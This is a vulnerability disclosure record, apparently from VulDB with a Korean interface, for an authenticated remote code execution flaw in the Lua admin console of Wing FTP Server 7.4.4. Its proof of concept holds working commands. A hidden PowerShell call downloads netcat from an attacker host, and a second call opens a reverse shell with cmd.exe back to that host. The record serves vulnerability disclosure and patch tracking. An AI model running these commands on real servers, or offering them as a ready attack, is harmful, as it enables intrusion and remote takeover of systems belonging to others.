| 제목 | wftpserver Wing FTP Server 7.4.4 Remote Code Execution via Lua Admin Console |
|---|
| 설명 | Affected Version: Wing FTP Server 7.4.4 (Windows)
Authentication Required: Yes
Wing FTP Server provides an administrative Lua scripting console accessible via its web interface. Authenticated administrators are able to execute arbitrary Lua code with insufficient sandboxing.
---
POC:
To execute the exploit, I logged into the application with a admin account via remote web access. The Wing FTP Server was in my Windows and I accessed the console via browser in my Linux (the software has remote access feature).
In the Lua admin console, type the following command:
os.execute('powershell -NoP -NonI -W Hidden -Exec Bypass -Command "(New-Object Net.WebClient).DownloadFile(\'http://192.168.234.131:8000/nc.exe\', \'C:\\\\Users\\\\usuario\\\\Desktop\\\\Drops\\\\nc.exe\')"')
os.execute('cmd /c powershell -NoP -W Hidden -Command "Start-Process \\"C:\\Users\\usuario\\Desktop\\Drops\\nc.exe\\" -ArgumentList \\"192.168.234.131\\",\\"4443\\",\\"-e\\",\\"cmd.exe\\""')
---
The first peace of the command will download the nc.exe (netcat for Windows x86) to the path "C:\Users\usuario\Desktop\Drops". The second part will execute nc.exe 192.168.234.131 4443 -e cme.exe. Now you get a reverse shell!
Is possible to see in this link (https://www.wftpserver.com/serverhistory.htm) the vendor mention that RCE in version 7.4.4 was fixed. |
|---|
| 원천 | ⚠️ https://github.com/Nouvexr/Wing-FTP-Server-7.4.4-RCE-Authenticated/blob/main/poc.txt |
|---|
| 사용자 | nouvexr (UID 33215) |
|---|
| 제출 | 2025. 05. 24. PM 04:44 (1 년도 ago) |
|---|
| 모더레이션 | 2025. 05. 26. AM 10:20 (2 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 310279 [Wing FTP Server 까지 7.4.3 Lua Admin Console 권한 상승] |
|---|
| 포인트들 | 20 |
|---|